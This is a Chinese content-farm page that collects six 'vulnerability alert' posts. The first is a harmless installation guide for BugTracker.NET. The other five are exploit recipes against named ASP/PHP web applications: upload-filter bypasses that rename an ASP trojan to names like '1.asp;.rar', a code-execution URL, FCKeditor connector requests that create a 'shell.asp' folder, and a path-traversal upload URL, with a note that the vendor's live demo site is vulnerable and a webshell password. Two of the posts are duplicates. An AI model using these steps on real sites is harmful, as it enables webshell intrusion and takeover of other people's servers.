bug漏洞处理机制系统bugtracker漏洞预警
“粉色考拉”通过精心收集,向本站投稿了6篇bug漏洞处理机制系统bugtracker漏洞预警,下面是小编整理后的bug漏洞处理机制系统bugtracker漏洞预警,欢迎您阅读,希望对您有所帮助。
篇1:bug漏洞处理机制系统bugtracker漏洞预警
为公司配置了一个Bug跟踪系统,找到BugTracker.NET,读了一下,翻译了其中的配置方法,以后有研究心得再放上来分享。
有需要的朋友可以在下面的网址去下载sourceforge.net/project/showfiles.php?group_id=66812
BugTracker.NET的首页是ifdefined.com/bugtrackernet.html,开源软件。想研究源码的直接下回去研究就是了。
你需要安装IIS 和ASP.NET2.0。 同时 SQL Server也必须运行起来,SQL Express也可以
下面是主要的步骤
1.解压缩zip文件到一个目录
2. 创建一个IIS 虚拟目录并且指向刚才的文件夹。请查看下面的连接support.microsoft.com/kb/172138 了解如何创建IIS虚拟目录
3.编辑文件 Welcoming ,根据不同的节改变如下的设置
LogFileFolder 指向 日志文件夹
AbsoluteUrlPrefix 指向首页
4. 创建数据库,名字根据喜好而定。 如国你没有SQL Server Management Studio Express来创建数据库。你可以用BugTracker.NET 的
网页来替代这个工作。首先设置Web.config中的ConnectionString 指向master数据库,打开网站导向到首页。选择Setup Database Tables联接,然后点击Create Database按钮。
5. 修改web.config中的ConnectionString指向你新创建的数据
6. 打开浏览器导向到站点的虚拟目录,并且以用户admin(密码是admin)登陆(如果默认页面不是default.aspx,请在IIS中指定默认页)
系统会提示运行setup.sql,创建表格,你也可以在SQL 企业管理器中运行这个脚本,
7. 请认真读下面的警告
警告:如果你打算在公共服务器上使用BugTracking.NET作为您的Bug跟踪管理系统,当安装配置完成后,你还应该做下面的事:
1. 改变admin帐户的密码
2. 删除下面的文件:query.aspx install.aspx
现在,你可以开始通过点 add a bug 开始创建bug. 请花一些时间来阅读这篇文档,同时也请阅读web.config了解你能用BugTracker.NET能为你做什么。
如果你打算备份BugTracker.NET数据,备份下面的文件:
1. SQL Server数据库
2.Web.config中指定的UploadFolder.
3. 你的自定义配置文件
a) Web.config
b) btnet_service.exe.config
c) btnet_custom.css, btnet_edit_bug.css, btnet_search.css
参考文献:ifdefined.com/bugtrackernet.html
网盘下载:点击下载
其他下载:点击下载
篇2:毕业论文选题系统上传漏洞漏洞预警
漏洞出在fileload目录下的FileUpload.asp文件中,用的是无惧组建上传
看代码
01var fu = new FileUpload(“uploadForm”,“idFile”, { Limit: 3, ExtIn: [“rar”,“doc”,“xls”], RanName: true,
02onIniFile: function(file){ file.value ? file.style.display =“none” : this.Folder.removeChild(file); },
03onEmpty: function{ alert(“请选择一个文件”); },
04onLimite: function(){ alert(“超过上传限制”); },
05onSame: function(){ alert(“已经有相同文件”); },
06onNotExtIn: function(){ alert(“只允许上传” + this.ExtIn.join(“,”) +“文件”); },
07onFail: function(file){ this.Folder.removeChild(file); },
08onIni: function(){
09//显示文件列表
10var arrRows = [];
11if(this.Files.length){
12var This = this;
13Each(this.Files, function(o){
14var a = document.createElement(“a”); a.innerHTML =“取消”; a.href =“javascript.:void(0);”;
15a.onclick = function(){ oThis.Delete(o); return false; };
16arrRows.push([o.value, a]);
17});
18} else { arrRows.push([“没有添加文件”,“ ”]); }
19AddList(arrRows);
20//设置按钮
21$(“idBtnupload”).disabled = $(“idBtndel”).disabled = this.Files.length <= 0;
22}
23});
24
25$(“idBtnupload”).onclick = function(){
26//显示文件列表
27var arrRows = [];
28Each(fu.Files, function(o){ arrRows.push([o.value,“ ”]); });
29AddList(arrRows);
30
31fu.Folder.style.display =“none”;
32$(“idProcess”).style.display =“”;
33$(“idMsg”).innerHTML =“正在上传文件到服务器,请稍候……
有可能因为网络问题,出现程序长时间无响应,请点击“取消”重新上传文件”;
34
35fu.Form.submit();
36}
37
38//用来添加文件列表的函数
39function AddList(rows){
40//根据数组来添加列表
41var FileList = $(“idFileList”), Fragment = document.createDocumentFragment();
42//用文档碎片保存列表
43Each(rows, function(cells){
44var row = document.createElement(“tr”);
45Each(cells, function(o){
46var cell = document.createElement(“td”);
47if(typeof o ==“string”){ cell.innerHTML = o; }else{ cell.appendChild(o); }
48row.appendChild(cell);
49});
50oFragment.appendChild(row);
51})
52//ie的table不支持innerHTML所以这样清空table
53while(FileList.hasChildNodes()){ FileList.removeChild(FileList.firstChild); }
54FileList.appendChild(oFragment);
55}
56
57
58$(“idLimit”).innerHTML = fu.Limit;
59
60$(“idExt”).innerHTML = fu.ExtIn.join(“,”);
61
62$(“idBtndel”).onclick = function(){ fu.Clear(); }
63
64//在后台通过window.parent来访问主页面的函数
65function Finish(msg){ alert(msg); location.href = location.href; }
66
67
68注意:
69
·请选择【rar,doc,xls】格式的文件,其他格式的文件请打包后再上传,
毕业论文选题系统上传漏洞漏洞预警
,
70
·文件名尽量详细,以方便下载。
71
·文件不能过大。
72
73
没有将文件重命名,外加本地JS验证。配合IIS6.0解析漏洞 如果是IIS7 的话用火狐
漏洞利用方法:
访问www.xxx.com/fileload/FileUpload.asp 然后将ASP木马改为1.asp;.rar 或者asp;.xsl 也行 上传后的文件存在/fileload/file/下面
网站系统下载地址:down.admin5.com/asp/60831.html
篇3:opcms内容管理系统Oday漏洞预警
漏洞文件cp.php,文件存在代码执行漏洞,
opcms内容管理系统Oday漏洞预警
,
127.0.0.1/cp.php?opc=phpinfo()
后台获取shell方法在网站信息设置那里,点击email修改!
插入如下代码 ‘?>/*
篇4:ShopWind网店系统 v1.02 上传漏洞漏洞预警
老问题,这个程序用的是FCKeditor 编辑器,
利用的解析问题。直接说利用方法!
第一步:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
篇5:ShopWind网店系统 v1.02 上传漏洞漏洞预警
Author:Lan3a
老问题,这个程序用的是FCKeditor 编辑器,
利用2003的解析问题。直接说利用方法!
第一步:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
篇6:网趣网站管理系统上传漏洞漏洞预警
程序:网趣网站管理系统1.2.1 (包含动态版和静态版 均存在此漏洞)
下载:www.codepub.com/d/downpage.php?n=1&id=18716::1288173021
FROM:www.st999.cn/blog
DATA:2010/04/22
利用方法:/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1
漏洞文件:Free_ComQu\Ku_edit\ComquUp.asp
源码 :
<%Response.Buffer=True
Server.ScriptTimeOut=9999999
On Error Resume Next%>
酷航文件上传系统V2
<%
response.Cookies(“ComquUp”)=“1”
'您可以把上面判断cookies的写入语句复制到您登录的地方,这样便是“只有登录后才能操作上传文件,”
if request.Cookies(“ComquUp”)=“1” then%>
<%
ComquDFormName=trim(request(“nf”))
ComquDInputName=trim(request(“ni”))
ComquDYNReName=trim(request(“nr”))
ComquDPath=trim(request(“nt”))
ComquDDM=trim(request(“nm”))
ComquDPathQ=trim(request(“nq”))
ComquDType=trim(request(“lx”))
if ComquDPath“” then:ComquSavePath=ComquDPath:else:ComquSavePath=“/Upfile/edit/”:end if
if ComquDPathQ“” then:ComquSavePathQ=ComquDPathQ:else:ComquSavePathQ=ComquSavePath:end if
ComquYNPath(ComquSavePath)
if ComquDType=“1” then
ComquFileNames=“jpg,gif,png,bmp”
ComquBigSize=1024000'单位B
elseif ComquDType=“2” then
ComquFileNames=“swf,flv”
ComquBigSize=10240000
elseif ComquDType=“3” then
ComquFileNames=“avi,wmv,asf,mov,mp3,wma”
ComquBigSize=102400000
elseif ComquDType=“4” then
ComquFileNames=“rm,ra,ram,rmvb”
ComquBigSize=102400000
elseif ComquDType=“5” then
ComquFileNames=“txt,rar,zip,doc,7z,ppt”
ComquBigSize=102400000
end if
ComquFileSize=Request.TotalBytes
If ComquFileSize>0 Then
if ComquFileSize Set ComquUpStm=Server.CreateObject(“ADODB.Stream”) ComquUpStm.Type=1 ComquUpStm.Open ComquUpStm.Write Request.BinaryRead(ComquFileSize) ComquUpStm.Position=0 ComquFormDataSize=ComquUpStm.Read ComquCrlf=chrB(13)&chrB(10) ComquFormStart=InStrB(ComquFormDataSize,ComquCrlf) ComquFormEnd=InStrB(ComquFormStart+1,ComquFormDataSize,ComquCrlf) Set ComquFormStm=Server.Createobject(“ADODB.Stream”) ComquFormStm.Type=1 ComquFormStm.Open ComquUpStm.Position=ComquFormStart + 1 ComquUpStm.CopyTo ComquFormStm,ComquFormEnd-ComquFormStart-3 ComquFormStm.Position=0 ComquFormStm.Type=2 ComquFormStm.CharSet=“GB2312” ComquFormStmText=ComquFormStm.Readtext ComquFormStm.Close ComquUpFileNAll=Mid(ComquFormStmText,InstrRev(ComquFormStmText,“\”)+1,ComquFormEnd) ComquUpFileCZM=mid(ComquUpFileNAll,InstrRev(ComquUpFileNAll,“.”)) If ComquCheckFileCZM(ComquUpFileNAll) Then if ComquDDM“” then ComquUpFileName=ComquDDM else if ComquDYNReName“ok” then:ComquUpFileName=ComquUpFileNAll:else:ComquUpFileName=Year(now)&right(“0”&Month(now),2)&right(“0”&Day(now),2)&right(“0”&Hour(now),2)&right(“0”&Minute(now),2)&right(“0”&Second(now),2)&right(replace(Request.ServerVariables(“REMOTE_ADDR”),“.”,“”),4)&ComquUpFileCZM:end if end if ComquSaveFile=Server.MapPath(ComquSavePath & ComquUpFileName) k=Instrb(ComquFormDataSize,ComquCrlf&ComquCrlf)+4 l=Instrb(k+1,ComquFormDataSize,leftB(ComquFormDataSize,ComquFormStart-1))-k-2 ComquFormStm.Type=1 ComquFormStm.Open ComquUpStm.Position=k-1 ComquUpStm.CopyTo ComquFormStm,l ComquFormStm.SaveToFile ComquSaveFile,2
if ComquDFormName“” then:Response.write“”:else:Response.write“”:end if
Response.write“”&left(ComquSaveFileName,3)&“**”&ComquUpFileCZM&“ 上传成功! 重新上传
”
Else
Response.write“文件格式不正确! 重新上传文 件
”
End If
Set ComquFormStm=Nothing
UploadStream.Close
Set UploadStream=Nothing
Function ComquCheckFileCZM(FileName)
FileType=Split(ComquFileNames,“,”)
For i=0 To Ubound(FileType)
If LCase(Right(FileName,len(FileType(i))))=LCase(FileType(i)) then
ComquCheckFileCZM=True
Exit Function
Else
ComquCheckFileCZM=False
End if
Next
End Function
Function ComquYNPath(FolderName)
ComquFolderM=Server.Mappath(FolderName)
Set Fso=CreateObject(“Scripting.FileSystemObject”)
If Not Fso.FolderExists(ComquFolderM) Then
Fso.CreateFolder(ComquFolderM)
End If
Set Fso=Nothing
End Function
else
Response.Write“大小超过”&ComquBigSize&“B! 重新上传
”
end if
Else%>
<%End if
else:response.Write(“您无权上传操作!”):end if%>
嘿嘿,,,很明显的nt参数未过滤,可以构造路径,直接上传获得shell,
此程序的官方演示地址,也存在着这漏洞。
main.comqu.com/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1
直接找个jpg的马儿上传,右键查看源码,获得名称../st999.asp;st999.asp;201104220019371540.jpg,实际上马儿的名称是st999.asp;201104220019371540.jpg,shell地址就是upload/2011/4/201104221740280470.jpg
这个是一句话,密码是st999,大家就不要轮J官方的演示站了,嘿嘿。。。
【bug漏洞处理机制系统bugtracker漏洞预警】相关文章:






文档为doc格式